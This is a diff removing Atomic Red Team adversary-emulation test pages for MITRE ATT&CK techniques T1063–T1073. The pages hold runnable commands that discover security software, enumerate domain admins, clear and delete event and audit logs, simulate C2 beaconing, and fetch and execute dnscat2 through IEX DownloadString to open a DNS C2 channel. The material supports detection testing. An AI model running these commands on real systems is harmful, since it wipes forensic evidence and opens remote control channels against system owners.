-
-<br/>
-
-## Atomic Test #1 - Installing Hyper-V Feature
-PowerShell command to check if Hyper-v is installed.
-Install Hyper-V feature.
-Create a New-VM
-
-Upon successful execution, powershell will check if Hyper-V is installed, if not, install it and create a base vm. Output will be via stdout.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| hostname | Host to query to see if Hyper-V feature is installed. | string | test-vm|
-| vm_name | Create a new VM. | string | testvm|
-| file_location | Location of new VHDX file | string | C:&#92;Temp&#92;test.vhdx|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Get-WindowsFeature -Name Hyper-V -ComputerName #{hostname}
-Install-WindowsFeature -Name Hyper-V -ComputerName #{hostname} -IncludeManagementTools
-New-VM -Name #{vm_name} -MemoryStartupBytes 1GB -NewVHDPath #{file_location} -NewVHDSizeBytes 21474836480
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1063.md b/Atomic_Threat_Coverage/Triggers/T1063.md
deleted file mode 100644
index 852b8c3..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1063.md
+++ /dev/null
@@ -1,165 +0,0 @@
-# T1063 - Security Software Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1063)
-<blockquote>Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1063) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
-
-### Windows
-
-Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), <code>reg query</code> with [Reg](https://attack.mitre.org/software/S0075), <code>dir</code> with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for.
-
-### Mac
-
-It's becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Security Software Discovery](#atomic-test-1---security-software-discovery)
-
-- [Atomic Test #2 - Security Software Discovery - powershell](#atomic-test-2---security-software-discovery---powershell)
-
-- [Atomic Test #3 - Security Software Discovery - ps](#atomic-test-3---security-software-discovery---ps)
-
-- [Atomic Test #4 - Security Software Discovery - Sysmon Service](#atomic-test-4---security-software-discovery---sysmon-service)
-
-- [Atomic Test #5 - Security Software Discovery - AV Discovery via WMI](#atomic-test-5---security-software-discovery---av-discovery-via-wmi)
-
-
-<br/>
-
-## Atomic Test #1 - Security Software Discovery
-Methods to identify Security Software on an endpoint
-
-when sucessfully executed, the test is going to display running processes, firewall configuration on network profiles
-and specific security software.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-netsh.exe advfirewall  show allprofiles
-tasklist.exe
-tasklist.exe | findstr /i virus
-tasklist.exe | findstr /i cb
-tasklist.exe | findstr /i defender
-tasklist.exe | findstr /i cylance
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Security Software Discovery - powershell
-Methods to identify Security Software on an endpoint
-
-when sucessfully executed, powershell is going to processes related AV products if they are running.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-get-process | ?{$_.Description -like "*virus*"}
-get-process | ?{$_.Description -like "*carbonblack*"}
-get-process | ?{$_.Description -like "*defender*"}
-get-process | ?{$_.Description -like "*cylance*"}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Security Software Discovery - ps
-Methods to identify Security Software on an endpoint
-when sucessfully executed, command shell  is going to display AV software it is running( Little snitch or carbon black ).
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-ps -ef | grep Little\ Snitch | grep -v grep
-ps aux | grep CbOsxSensorService
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Security Software Discovery - Sysmon Service
-Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).
-
-when sucessfully executed, the test is going to display sysmon driver instance if it is installed.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-fltmc.exe | findstr.exe 385201
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Security Software Discovery - AV Discovery via WMI
-Discovery of installed antivirus products via a WMI query.
-
-when sucessfully executed, the test is going to display installed AV software.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-wmic.exe /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1064.md b/Atomic_Threat_Coverage/Triggers/T1064.md
deleted file mode 100644
index 06dacd6..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1064.md
+++ /dev/null
@@ -1,89 +0,0 @@
-# T1064 - Scripting
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1064)
-<blockquote>Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and [PowerShell](https://attack.mitre.org/techniques/T1086) but could also be in the form of command-line batch scripts.
-
-Scripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.
-
-Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Create and Execute Bash Shell Script](#atomic-test-1---create-and-execute-bash-shell-script)
-
-- [Atomic Test #2 - Create and Execute Batch Script](#atomic-test-2---create-and-execute-batch-script)
-
-
-<br/>
-
-## Atomic Test #1 - Create and Execute Bash Shell Script
-Creates and executes a simple bash script.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
-sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh"
-chmod +x /tmp/art.sh
-sh /tmp/art.sh
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Create and Execute Batch Script
-Creates and executes a simple batch script. Upon execution, CMD will briefly launh to run the batch script then close again.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| command_to_execute | Command to execute within script. | string | dir|
-| script_path | Path of script to create. | path | $env:TEMP&#92;T1064_script.bat|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Start-Process #{script_path}
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item #{script_path} -Force -ErrorAction Ignore
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Batch file must exist on disk at specified location (#{script_path})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{script_path}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item #{script_path} -Force | Out-Null
-Set-Content -Path #{script_path} -Value "#{command_to_execute}"
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1065.md b/Atomic_Threat_Coverage/Triggers/T1065.md
deleted file mode 100644
index fe1a98f..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1065.md
+++ /dev/null
@@ -1,72 +0,0 @@
-# T1065 - Uncommonly Used Port
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1065)
-<blockquote>Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Testing usage of uncommonly used port with PowerShell](#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell)
-
-- [Atomic Test #2 - Testing usage of uncommonly used port](#atomic-test-2---testing-usage-of-uncommonly-used-port)
-
-
-<br/>
-
-## Atomic Test #1 - Testing usage of uncommonly used port with PowerShell
-Testing uncommonly used port utilizing PowerShell. APT33 has been known to attempt telnet over port 8081. Upon exectuion, details about the successful
-port check will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| port | Specify uncommon port number | String | 8081|
-| domain | Specify target hostname | String | google.com|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Test-NetConnection -ComputerName #{domain} -port #{port}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Testing usage of uncommonly used port
-Testing uncommonly used port utilizing telnet.
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| port | Specify uncommon port number | String | 8081|
-| domain | Specify target hostname | String | google.com|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-telnet #{domain} #{port}
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1069.md b/Atomic_Threat_Coverage/Triggers/T1069.md
deleted file mode 100644
index 978e1a4..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1069.md
+++ /dev/null
@@ -1,145 +0,0 @@
-# T1069 - Permission Groups Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1069)
-<blockquote>Adversaries may attempt to find local system or domain-level groups and permissions settings. 
-
-### Windows
-
-Examples of commands that can list groups are <code>net group /domain</code> and <code>net localgroup</code> using the [Net](https://attack.mitre.org/software/S0039) utility.
-
-### Mac
-
-On Mac, this same thing can be accomplished with the <code>dscacheutil -q group</code> for the domain, or <code>dscl . -list /Groups</code> for local groups.
-
-### Linux
-
-On Linux, local groups can be enumerated with the <code>groups</code> command and domain groups via the <code>ldapsearch</code> command.
-
-### Office 365 and Azure AD
-
-With authenticated access there are several tools that can be used to find permissions groups. The <code>Get-MsolRole</code> PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts.(Citation: Microsoft msrole)(Citation: GitHub Raindance)
-
-Azure CLI (AZ CLI) also provides an interface to obtain permissions groups with authenticated access to a domain. The command <code>az ad user get-member-groups</code> will list groups associated to a user account.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Permission Groups Discovery](#atomic-test-1---permission-groups-discovery)
-
-- [Atomic Test #2 - Basic Permission Groups Discovery Windows](#atomic-test-2---basic-permission-groups-discovery-windows)
-
-- [Atomic Test #3 - Permission Groups Discovery PowerShell](#atomic-test-3---permission-groups-discovery-powershell)
-
-- [Atomic Test #4 - Elevated group enumeration using net group](#atomic-test-4---elevated-group-enumeration-using-net-group)
-
-
-<br/>
-
-## Atomic Test #1 - Permission Groups Discovery
-Permission Groups Discovery
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi; fi;
-if [ -x "$(command -v dscl)" ]; then dscl . -list /Groups; else echo "dscl is missing from the machine. skipping..."; fi;
-if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from the machine. skipping..."; fi;
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Basic Permission Groups Discovery Windows
-Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
-information will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-net localgroup
-net group /domain
-net group "domain admins" /domain
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Permission Groups Discovery PowerShell
-Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
-information will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| user | User to identify what groups a user is a member of | string | administrator|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-get-localgroup
-get-ADPrincipalGroupMembership #{user} | select name
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Elevated group enumeration using net group
-Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This
-test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-net group /domai "Domain Admins"
-net groups "Account Operators" /doma
-net groups "Exchange Organization Management" /doma
-net group "BUILTIN\Backup Operators" /doma
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1070.md b/Atomic_Threat_Coverage/Triggers/T1070.md
deleted file mode 100644
index e436fef..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1070.md
+++ /dev/null
@@ -1,235 +0,0 @@
-# T1070 - Indicator Removal on Host
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070)
-<blockquote>Adversaries may delete or alter generated artifacts on a host system, including logs and potentially captured files such as quarantined malware. Locations and format of logs will vary, but typical organic system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1139) and /var/log/* .
-
-Actions that interfere with eventing and other notifications that can be used to detect intrusion activity may compromise the integrity of security solutions, causing events to go unreported. They may also make forensic analysis and incident response more difficult due to lack of sufficient data to determine what occurred.
-
-### Clear Windows Event Logs
-
-Windows event logs are a record of a computer's alerts and notifications. Microsoft defines an event as "any significant occurrence in the system or in a program that requires users to be notified or an entry added to a log." There are three system-defined sources of Events: System, Application, and Security.
- 
-Adversaries performing actions related to account management, account logon and directory service access, etc. may choose to clear the events in order to hide their activities.
-
-The event logs can be cleared with the following utility commands:
-
-* <code>wevtutil cl system</code>
-* <code>wevtutil cl application</code>
-* <code>wevtutil cl security</code>
-
-Logs may also be cleared through other mechanisms, such as [PowerShell](https://attack.mitre.org/techniques/T1086).</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Clear Logs](#atomic-test-1---clear-logs)
-
-- [Atomic Test #2 - FSUtil](#atomic-test-2---fsutil)
-
-- [Atomic Test #3 - rm -rf](#atomic-test-3---rm--rf)
-
-- [Atomic Test #4 - Overwrite Linux Mail Spool](#atomic-test-4---overwrite-linux-mail-spool)
-
-- [Atomic Test #5 - Overwrite Linux Log](#atomic-test-5---overwrite-linux-log)
-
-- [Atomic Test #6 - Delete System Logs Using PowerShell](#atomic-test-6---delete-system-logs-using-powershell)
-
-- [Atomic Test #7 - Delete System Logs Using Clear-EventLogId](#atomic-test-7---delete-system-logs-using-clear-eventlogid)
-
-
-<br/>
-
-## Atomic Test #1 - Clear Logs
-Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| log_name | Windows Log Name, ex System | String | System|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-wevtutil cl #{log_name}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - FSUtil
-Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. Upon exectuion, no output
-will be displayed. More information about fsutil can be found at https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-fsutil usn deletejournal /D C:
-```
-
-#### Cleanup Commands:
-```cmd
-fsutil usn createjournal m=1000 a=100 c:
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - rm -rf
-Delete system and audit logs
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-rm -rf /private/var/log/system.log*
-rm -rf /private/var/audit/*
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Overwrite Linux Mail Spool
-This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
-
-**Supported Platforms:** Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| username | Username of mail spool | String | root|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-echo 0> /var/spool/mail/#{username}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Overwrite Linux Log
-This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
-
-**Supported Platforms:** Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| log_path | Path of specified log | Path | /var/log/secure|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-echo 0> #{log_path}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Delete System Logs Using PowerShell
-Recommended Detection: Monitor for use of the windows event log filepath in PowerShell couple with delete arguments.
-Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.
-When this service get's stopped, it is automatically restarted and the Security.evtx folder re-created.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-$eventLogId = Get-WmiObject -Class Win32_Service -Filter "Name LIKE 'EventLog'" | Select-Object -ExpandProperty ProcessId
-Stop-Process -Id $eventLogId -Force
-Remove-Item C:\Windows\System32\winevt\Logs\Security.evtx
-```
-
-#### Cleanup Commands:
-```powershell
-Start-Service -Name EventLog
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Delete System Logs Using Clear-EventLogId
-Clear event logs using built-in PowerShell commands.
-Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-Clear-EventLog -logname Application
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1071.md b/Atomic_Threat_Coverage/Triggers/T1071.md
deleted file mode 100644
index eb8ad78..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1071.md
+++ /dev/null
@@ -1,267 +0,0 @@
-# T1071 - Standard Application Layer Protocol
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1071)
-<blockquote>Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
-
-For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Malicious User Agents - Powershell](#atomic-test-1---malicious-user-agents---powershell)
-
-- [Atomic Test #2 - Malicious User Agents - CMD](#atomic-test-2---malicious-user-agents---cmd)
-
-- [Atomic Test #3 - Malicious User Agents - Nix](#atomic-test-3---malicious-user-agents---nix)
-
-- [Atomic Test #4 - DNS Large Query Volume](#atomic-test-4---dns-large-query-volume)
-
-- [Atomic Test #5 - DNS Regular Beaconing](#atomic-test-5---dns-regular-beaconing)
-
-- [Atomic Test #6 - DNS Long Domain Query](#atomic-test-6---dns-long-domain-query)
-
-- [Atomic Test #7 - DNS C2](#atomic-test-7---dns-c2)
-
-
-<br/>
-
-## Atomic Test #1 - Malicious User Agents - Powershell
-This test simulates an infected host beaconing to command and control. Upon execution, no output will be displayed. 
-Use an application such as Wireshark to record the session and observe user agent strings and responses.
-
-Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| domain | Default domain to simulate against | string | www.google.com|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null
-Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
-Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
-Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Malicious User Agents - CMD
-This test simulates an infected host beaconing to command and control. Upon execution, no out put will be displayed. 
-Use an application such as Wireshark to record the session and observe user agent strings and responses.
-
-Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| domain | Default domain to simulate against | string | www.google.com|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-curl -s -A "HttpBrowser/1.0" -m3 #{domain} >nul 2>&1
-curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain} >nul 2>&1
-curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain} >nul 2>&1
-curl -s -A "*<|>*" -m3 #{domain} >nul 2>&1
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Malicious User Agents - Nix
-This test simulates an infected host beaconing to command and control.
-Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| domain | Default domain to simulate against | string | www.google.com|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-curl -s -A "HttpBrowser/1.0" -m3 #{domain}
-curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
-curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
-curl -s -A "*<|>*" -m3 #{domain}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - DNS Large Query Volume
-This test simulates an infected host sending a large volume of DNS queries to a command and control server.
-The intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source system or to a single targe domain.
-A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| domain | Default domain to simulate against | string | 127.0.0.1.xip.io|
-| subdomain | Subdomain prepended to the domain name | string | atomicredteam|
-| query_type | DNS query type | string | TXT|
-| query_volume | Number of DNS queries to send | integer | 1000|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - DNS Regular Beaconing
-This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time.
-This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection.
-A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| domain | Default domain to simulate against | string | 127.0.0.1.xip.io|
-| subdomain | Subdomain prepended to the domain name | string | atomicredteam|
-| query_type | DNS query type | string | TXT|
-| c2_interval | Seconds between C2 requests to the command and control server | integer | 30|
-| c2_jitter | Percentage of jitter to add to the C2 interval to create variance in the times between C2 requests | integer | 20|
-| runtime | Time in minutes to run the simulation | integer | 30|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Set-Location PathToAtomicsFolder
-.\T1071\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - DNS Long Domain Query
-This test simulates an infected host returning data to a command and control server using long domain names.
-The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold.
- Upon execution, DNS information about the domain will be displayed for each callout.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| domain | Default domain to simulate against | string | 127.0.0.1.xip.io|
-| subdomain | Subdomain prepended to the domain name (should be 63 characters to test maximum length) | string | atomicredteamatomicredteamatomicredteamatomicredteamatomicredte|
-| query_type | DNS query type | string | TXT|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Set-Location PathToAtomicsFolder
-.\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - DNS C2
-This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command.
-The following blogs have more information.
-
-https://github.com/iagox86/dnscat2
-
-https://github.com/lukebaggett/dnscat2-powershell
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| domain | Domain Name configured to use DNS Server where your C2 listener is running | string | example.com|
-| server_ip | IP address of DNS server where your C2 listener is running | string | 127.0.0.1|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
-Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1073.md b/Atomic_Threat_Coverage/Triggers/T1073.md
deleted file mode 100644
index fb3f468..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1073.md
+++ /dev/null
@@ -1,59 +0,0 @@
-# T1073 - DLL Side-Loading
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1073)
-<blockquote>Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: MSDN Manifests) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL. (Citation: Stewart 2014)
-
-Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary](#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary)
-
-
-<br/>
-
-## Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary
-GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded.
-Upon execution, calc.exe will be opened.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| process_name | Name of the created process | string | calculator.exe|
-| gup_executable | GUP is an open source signed binary used by Notepad++ for software updates | path | PathToAtomicsFolder&#92;T1073&#92;bin&#92;GUP.exe|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-#{gup_executable}
-```
-
-#### Cleanup Commands:
-```cmd
-taskkill /F /IM #{process_name} >nul 2>&1
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Gup.exe binary must exist on disk at specified location (#{gup_executable})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{gup_executable}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1073/bin/GUP.exe" -OutFile "#{gup_executable}"
-```
-
-
-
